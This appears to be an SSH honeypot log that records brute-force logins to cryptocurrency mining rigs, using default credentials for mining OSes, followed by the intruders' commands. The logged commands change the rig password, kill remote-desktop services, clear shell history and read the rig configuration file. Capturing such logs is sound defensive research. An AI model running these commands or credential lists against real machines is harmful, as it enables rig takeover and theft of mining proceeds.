2021-11-23 13:08:30,414 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 13:08:30,414 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 13:08:30,414 - paramiko.transport - ERROR - EOFError
2021-11-23 13:08:30,415 - paramiko.transport - ERROR - 
2021-11-23 13:08:30,415 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 13:08:30,415 - paramiko.transport - ERROR - 
2021-11-23 13:08:30,415 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:08:30,415 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 13:08:30,415 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 13:08:30,415 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 13:08:30,415 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 13:08:30,415 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 13:08:30,415 - paramiko.transport - ERROR - 
2021-11-23 13:09:13,061 - root - INFO - New connection from: 23.183.81.227
2021-11-23 13:09:13,070 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 13:09:15,086 - root - INFO - New client credentials from 23.183.81.227: username: user, password: 1
2021-11-23 13:09:15,086 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 13:09:15,374 - root - INFO - New command from 23.183.81.227: b'sudo hive-passwd 123456cnur; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 13:10:27,945 - root - INFO - New connection from: 23.183.81.227
2021-11-23 13:10:27,947 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 13:10:30,616 - root - INFO - New client credentials from 23.183.81.227: username: user, password: 123456
2021-11-23 13:10:30,616 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 13:10:30,918 - root - INFO - New command from 23.183.81.227: b'sudo hive-passwd 123456cnur; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 13:11:52,061 - root - INFO - New connection from: 23.183.81.227
2021-11-23 13:11:52,064 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 13:11:52,623 - root - INFO - New client credentials from 23.183.81.227: username: user, password: dS5mdWNraW4udHJpZWQubmlnZ2E
2021-11-23 13:11:52,623 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 13:11:52,813 - root - INFO - New command from 23.183.81.227: b'sudo hive-passwd 123456cnur; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 13:13:11,215 - root - INFO - New connection from: 23.183.81.227
2021-11-23 13:13:11,221 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 13:13:13,359 - root - INFO - New client credentials from 23.183.81.227: username: user, password: fwontop
2021-11-23 13:13:13,359 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 13:13:13,766 - root - INFO - New command from 23.183.81.227: b'sudo hive-passwd 123456cnur; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 13:19:51,083 - root - INFO - New connection from: 199.19.224.231
2021-11-23 13:19:51,229 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 13:19:51,229 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 13:19:51,229 - paramiko.transport - ERROR - EOFError
2021-11-23 13:19:51,229 - paramiko.transport - ERROR - 
2021-11-23 13:19:51,229 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 13:19:51,229 - paramiko.transport - ERROR - 
2021-11-23 13:19:51,229 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 13:19:51,229 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 13:19:51,230 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 13:19:51,230 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 13:19:51,230 - paramiko.transport - ERROR - 
2021-11-23 13:20:44,017 - root - INFO - New connection from: 199.19.224.231
2021-11-23 13:20:44,018 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 13:20:45,958 - root - INFO - New client credentials from 199.19.224.231: username: user, password: 1
2021-11-23 13:20:45,958 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 13:20:46,438 - root - INFO - New command from 199.19.224.231: b'sudo hive-passwd dg801b23dg12dwqsdghaiodg120dgasodg1wo08_123Z; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c; cat /hive-config/rig.conf'
2021-11-23 13:31:23,623 - root - INFO - New connection from: 128.1.42.94
2021-11-23 13:31:23,782 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 13:31:23,782 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 13:31:23,783 - paramiko.transport - ERROR - EOFError
2021-11-23 13:31:23,783 - paramiko.transport - ERROR - 
2021-11-23 13:31:23,783 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 13:31:23,783 - paramiko.transport - ERROR - 
2021-11-23 13:31:23,783 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 13:31:23,783 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 13:31:23,783 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 13:31:23,783 - paramiko.transport - ERROR - 
2021-11-23 13:32:41,791 - root - INFO - New connection from: 23.183.81.54
2021-11-23 13:32:41,877 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - EOFError
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - 
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - 
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 13:32:41,878 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 13:32:41,878 - paramiko.transport - ERROR - 
2021-11-23 13:33:46,103 - root - INFO - New connection from: 23.183.81.54
2021-11-23 13:33:46,104 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 13:33:48,868 - root - INFO - New client credentials from 23.183.81.54: username: user, password: 1
2021-11-23 13:33:48,868 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 13:33:49,145 - root - INFO - New command from 23.183.81.54: b'sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c'
2021-11-23 14:04:12,759 - root - INFO - New connection from: 104.248.203.112
2021-11-23 14:04:12,777 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 14:04:12,777 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 14:04:12,777 - paramiko.transport - ERROR - EOFError
2021-11-23 14:04:12,777 - paramiko.transport - ERROR - 
2021-11-23 14:04:12,777 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 14:04:12,777 - paramiko.transport - ERROR - 
2021-11-23 14:04:12,777 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 14:04:12,777 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 14:04:12,778 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 14:04:12,778 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 14:04:12,778 - paramiko.transport - ERROR - 
2021-11-23 14:07:04,151 - root - INFO - New connection from: 104.248.203.112
2021-11-23 14:07:04,152 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 14:07:04,241 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 14:07:04,258 - root - INFO - New client credentials from 104.248.203.112: username: root, password: huawei@123
2021-11-23 14:07:04,258 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 14:07:04,292 - root - INFO - New command from 104.248.203.112: b'uname -s -v -n -r -m'
2021-11-23 14:09:04,770 - root - INFO - New connection from: 104.248.203.112
2021-11-23 14:09:04,771 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 14:09:04,869 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 14:09:04,888 - root - INFO - New client credentials from 104.248.203.112: username: root, password: Change_Me
2021-11-23 14:09:04,888 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 14:09:04,926 - root - INFO - New command from 104.248.203.112: b'uname -s -v -n -r -m'
2021-11-23 14:10:04,771 - root - INFO - New connection from: 104.248.203.112
2021-11-23 14:10:04,775 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 14:10:04,878 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 14:10:04,898 - root - INFO - New client credentials from 104.248.203.112: username: root, password: 11111111
2021-11-23 14:10:04,898 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 14:10:04,938 - root - INFO - New command from 104.248.203.112: b'uname -s -v -n -r -m'
2021-11-23 14:10:14,919 - root - INFO - New connection from: 205.185.119.40
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - EOFError
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - 
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - 
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 14:10:14,920 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 14:10:14,920 - paramiko.transport - ERROR - 
2021-11-23 14:12:04,968 - root - INFO - New connection from: 104.248.203.112
2021-11-23 14:12:04,973 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 14:12:05,061 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 14:12:05,078 - root - INFO - New client credentials from 104.248.203.112: username: root, password: 123456
2021-11-23 14:12:05,078 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 14:12:05,112 - root - INFO - New command from 104.248.203.112: b'uname -s -v -n -r -m'
2021-11-23 14:13:04,965 - root - INFO - New connection from: 104.248.203.112
2021-11-23 14:13:04,966 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 14:13:05,064 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 14:13:05,083 - root - INFO - New client credentials from 104.248.203.112: username: mos, password: mos
2021-11-23 14:13:05,083 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 14:13:05,119 - root - INFO - New command from 104.248.203.112: b'uname -s -v -n -r -m'
2021-11-23 14:32:57,553 - root - INFO - New connection from: 65.49.20.69
2021-11-23 14:32:57,568 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 14:32:58,223 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 14:43:18,839 - root - INFO - New connection from: 195.133.18.24
2021-11-23 14:43:18,858 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - EOFError
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - 
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - 
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 14:43:18,859 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 14:43:18,859 - paramiko.transport - ERROR - 
2021-11-23 14:43:50,911 - root - INFO - New connection from: 195.133.18.24
2021-11-23 14:43:50,921 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 14:43:51,088 - root - INFO - New client credentials from 195.133.18.24: username: user, password: 1
2021-11-23 14:43:51,088 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 14:43:51,143 - root - INFO - New command from 195.133.18.24: b'sudo hive-passwd c3Rvcnl0aW1lIGRheW9uZSBhbmQgZGF5dHdevbase64; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 15:51:46,232 - root - INFO - New connection from: 23.183.81.116
2021-11-23 15:51:46,322 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 15:51:46,322 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 15:51:46,322 - paramiko.transport - ERROR - EOFError
2021-11-23 15:51:46,322 - paramiko.transport - ERROR - 
2021-11-23 15:51:46,322 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 15:51:46,322 - paramiko.transport - ERROR - 
2021-11-23 15:51:46,322 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 15:51:46,322 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 15:51:46,323 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 15:51:46,323 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 15:51:46,323 - paramiko.transport - ERROR - 
2021-11-23 15:55:53,242 - root - INFO - New connection from: 23.183.81.116
2021-11-23 15:55:53,242 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 15:55:53,692 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 15:55:53,787 - root - INFO - New client credentials from 23.183.81.116: username: mos, password: mos
2021-11-23 15:55:53,787 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 15:55:53,965 - root - INFO - New command from 23.183.81.116: b'uname -s -v -n -r -m'
2021-11-23 15:57:13,142 - root - INFO - New connection from: 45.144.225.69
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - EOFError
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - 
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - 
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 15:57:13,164 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 15:57:13,164 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 15:57:13,165 - paramiko.transport - ERROR - 
2021-11-23 15:57:40,767 - root - INFO - New connection from: 45.144.225.69
2021-11-23 15:57:41,648 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 15:57:41,761 - root - INFO - New client credentials from 45.144.225.69: username: user, password: 1
2021-11-23 15:57:41,761 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 15:57:41,831 - root - INFO - New command from 45.144.225.69: b'sudo hive-passwd salutlume123; sudo pkill Xorg;'
2021-11-23 16:00:05,343 - root - INFO - New connection from: 23.183.81.116
2021-11-23 16:00:05,344 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:00:05,787 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 16:00:05,904 - root - INFO - New client credentials from 23.183.81.116: username: minerstat, password: msos
2021-11-23 16:00:05,904 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:00:06,426 - root - INFO - New command from 23.183.81.116: b'uname -s -v -n -r -m'
2021-11-23 16:03:42,157 - root - INFO - New connection from: 23.183.81.116
2021-11-23 16:03:42,159 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:03:42,590 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 16:03:42,671 - root - INFO - New client credentials from 23.183.81.116: username: ethos, password: live
2021-11-23 16:03:42,671 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:03:42,832 - root - INFO - New command from 23.183.81.116: b'uname -s -v -n -r -m'
2021-11-23 16:07:16,258 - root - INFO - New connection from: 23.183.81.116
2021-11-23 16:07:16,261 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:07:16,717 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 16:07:16,807 - root - INFO - New client credentials from 23.183.81.116: username: miner, password: mmpOS
2021-11-23 16:07:16,807 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:07:16,976 - root - INFO - New command from 23.183.81.116: b'uname -s -v -n -r -m'
2021-11-23 16:24:00,043 - root - INFO - New connection from: 167.248.133.57
2021-11-23 16:24:00,044 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:32:47,452 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:32:47,469 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:32:47,469 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:32:47,469 - paramiko.transport - ERROR - EOFError
2021-11-23 16:32:47,469 - paramiko.transport - ERROR - 
2021-11-23 16:32:47,469 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:32:47,469 - paramiko.transport - ERROR - 
2021-11-23 16:32:47,469 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:32:47,469 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:32:47,470 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:32:47,470 - paramiko.transport - ERROR - 
2021-11-23 16:36:57,918 - root - INFO - New connection from: 195.133.18.24
2021-11-23 16:36:57,939 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - EOFError
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - 
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - 
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:36:57,940 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:36:57,940 - paramiko.transport - ERROR - 
2021-11-23 16:37:38,440 - root - INFO - New connection from: 195.133.18.24
2021-11-23 16:37:38,441 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:37:38,647 - root - INFO - New client credentials from 195.133.18.24: username: user, password: 1
2021-11-23 16:37:38,647 - paramiko.transport - INFO - Auth granted (password).
